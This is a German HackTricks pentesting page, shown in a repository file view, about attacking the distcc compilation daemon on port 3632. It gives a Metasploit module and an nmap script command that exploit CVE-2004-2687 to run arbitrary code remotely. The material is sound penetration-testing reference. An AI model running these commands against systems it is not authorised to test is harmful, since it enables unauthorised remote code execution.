hacktricks/network-services-pentesting/3632-pentesting-distcc.md

42 lines
2.4 KiB
Markdown
Raw Normal View History

2022-04-28 16:01:33 +00:00
<details>
<summary><strong>Erlernen Sie AWS-Hacking von Null auf Held mit</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-02-10 15:36:32 +00:00
Andere Möglichkeiten, HackTricks zu unterstützen:
2022-04-28 16:01:33 +00:00
* Wenn Sie Ihr **Unternehmen in HackTricks beworben sehen möchten** oder **HackTricks im PDF-Format herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)!
* Holen Sie sich das [**offizielle PEASS & HackTricks-Merch**](https://peass.creator-spring.com)
2024-02-10 15:36:32 +00:00
* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden.
2022-04-28 16:01:33 +00:00
</details>
2024-02-10 15:36:32 +00:00
# Grundlegende Informationen
**Distcc** ist ein Tool, das den **Kompilierungsprozess** verbessert, indem es die **unbenutzte Rechenleistung** anderer Computer im Netzwerk nutzt. Wenn **distcc** auf einer Maschine eingerichtet ist, kann diese Maschine ihre **Kompilierungsaufgaben** an ein anderes System verteilen. Dieses Empfängersystem muss den **distccd-Daemon** ausführen und einen **kompatiblen Compiler** installiert haben, um den gesendeten Code zu verarbeiten.
2024-02-10 15:36:32 +00:00
**Standardport:** 3632
```
PORT STATE SERVICE
3632/tcp open distccd
```
2024-02-10 15:36:32 +00:00
# Ausnutzung
2024-02-10 15:36:32 +00:00
Überprüfen Sie, ob es anfällig für **CVE-2004-2687** ist, um beliebigen Code auszuführen:
```bash
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
```
2022-05-01 12:49:36 +00:00
# Shodan
2020-10-05 10:16:52 +00:00
2024-02-10 15:36:32 +00:00
_Ich glaube nicht, dass Shodan diesen Dienst erkennt._
2020-10-05 10:16:52 +00:00
2024-02-10 15:36:32 +00:00
# Ressourcen
2021-11-30 16:46:07 +00:00
* [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec)
* [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855)
Beitrag erstellt von **Álex B (@r1p)**